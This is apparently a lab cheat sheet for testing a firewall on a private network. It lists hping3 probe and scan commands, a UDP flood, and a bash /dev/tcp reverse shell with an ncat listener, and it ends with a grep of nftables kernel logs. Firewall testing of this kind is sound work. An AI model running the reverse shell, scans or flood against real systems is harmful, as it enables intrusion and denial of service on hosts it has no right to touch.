TCP SYN only
sudo hping3 -c 1 -S -p 8080 192.168.0.54

TCP FIN only
sudo hping3 -c 1 -F -p 8080 192.168.0.54

TCP PSH only
sudo hping3 -c 1 -P -p 8080 192.168.0.54

TCP URG only
sudo hping3 -c 1 -U -p 8080 192.168.0.54

TCP RST only
sudo hping3 -c 1 -R -p 8080 192.168.0.54

TCP XMAS
sudo hping3 -c 1 -FPU -p 8082 192.168.0.54

TCP FIN scan
sudo hping3 -F --scan 7000-8000 192.168.0.54

UDP flood
sudo hping3 -2 -c 1000 -i u1 -p 8081 192.168.0.54

reverse shell attacker:
ncat -l 8080

reverse shell victim:
/bin/bash -i >& /dev/tcp/192.168.0.53/8080 0>&1

live logs:
sudo journalctl -k | grep "nftables" >> nftlogs
